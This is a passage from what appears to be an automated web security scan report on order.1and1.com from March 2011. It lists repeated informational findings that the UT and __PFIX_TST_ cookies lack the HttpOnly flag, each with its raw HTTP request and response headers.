Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:43:13 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=2e6b9e6419f16800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingElements;jsessionid=E84431486E0F8FF18F5CC004E97A0DC6.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.85. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingMailinglist

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingMailinglist;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:28 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=DYlcnQUI4YWFhW25kazFpYzAiLGVYUipBNC4tMS4uLSstKygoKyokJyseIB8eG0AuWmZodi4wK1s0Xm0zJicjIicjISQiHCQbMTpyczkuNWVuNCcoJCMoJSIlICMkHR4=; Expires=Fri, 07-Apr-2079 21:59:35 GMT; Path=/
ETag: a0504884b1215fb9f46eacf2501db275
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16994


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.86. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingMailinglist

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__PFIX_TST_

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingMailinglist HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:45:16 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=19d9d648f2500000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist;jsessionid=70DD629BD13A168599BD366FA123B51E.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.87. http://order.1and1.com/xml/order/FeatureSite-buildingMap

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingMap

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingMap;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:37 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 21:57:44 GMT; Path=/
ETag: 645ffb56b5336d5e93c4fb610365ea26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18055


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.88. http://order.1and1.com/xml/order/FeatureSite-buildingMap

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingMap

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingMap HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:43:24 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=9f2e578a0ee4400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingMap;jsessionid=0A6666D5BF90393E057AAA728205379C.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.89. http://order.1and1.com/xml/order/FeatureSite-buildingNet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingNet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingNet HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:42:04 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=6f0d5596d7138000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingNet;jsessionid=C26A64D1473293F0BCEF8E2C3B082574.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.90. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingPhotogallery

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:42:45 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=FYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyAjHiEiMjM=; Expires=Fri, 07-Apr-2079 21:56:52 GMT; Path=/
ETag: 5997c61d42885f593110bfffe26fb460
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19309


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.91. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingPhotogallery

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingPhotogallery HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:42:24 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=625c83a492d9a400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery;jsessionid=0D01B726EB07D8A798F963D828852BA4.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.92. http://order.1and1.com/xml/order/FeatureSite-buildingRss

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingRss

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingRss;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:47 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:59:54 GMT; Path=/
ETag: 01cb6755ce08df139a4b6b446abadd19
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18568


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.93. http://order.1and1.com/xml/order/FeatureSite-buildingRss

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingRss

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingRss HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:45:42 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=413ff73ef856c000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingRss;jsessionid=00602F8FB6CF57D184916AE79D0856F4.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.94. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingWsb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingWsb HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:41:34 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=140b368813868c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingWsb;jsessionid=CD7C8228BB49F109C2DA35CD8FAC2A5A.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.95. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingWsb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:41:49 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:55:56 GMT; Path=/
ETag: 3664cb42dafe3db06f3ca98cf422ee72
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20579


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.96. http://order.1and1.com/xml/order/FeatureToolsRatepoint

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureToolsRatepoint

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureToolsRatepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
